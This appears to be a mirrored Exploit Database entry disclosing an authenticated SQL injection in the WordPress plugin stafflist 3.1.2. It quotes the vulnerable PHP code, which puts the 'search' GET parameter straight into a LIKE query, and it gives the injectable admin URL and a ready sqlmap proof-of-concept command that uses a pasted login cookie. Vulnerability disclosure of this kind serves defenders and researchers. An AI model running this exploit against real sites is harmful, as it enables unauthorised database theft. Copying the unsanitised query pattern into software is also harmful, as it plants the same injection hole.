WordPress Plugin stafflist 3.1.2 – SQLi (Authenticated)

• Exploit Database
• 37 阅读

• 作者： Hassan Khan Yusufzai
  日期： 2022-05-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50928/

• # Exploit Title: WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
  # Date: 05-02-2022
  # Exploit Author: Hassan Khan Yusufzai - Splint3r7
  # Vendor Homepage: https://wordpress.org/plugins/stafflist/
  # Version: 3.1.2
  # Tested on: Firefox
  # Contact me: h [at] spidersilk.com
  
  # Vulnerable Code:
  
  $w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?
  ...
  	$where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR
  			LOWER(firstname) LIKE '%{$w}%' OR
  			LOWER(department)LIKE '%{$w}%' OR
  			LOWER(email) LIKE '%{$w}%'" : "");
  
  
  # Vulnerable URL
  
  http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]
  
  # POC
  
  ```
  sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*'
  --cookie="wordpress_cookies_paste_here"
  ```
  
  # POC Image
  
  https://prnt.sc/AECcFRHhe2ib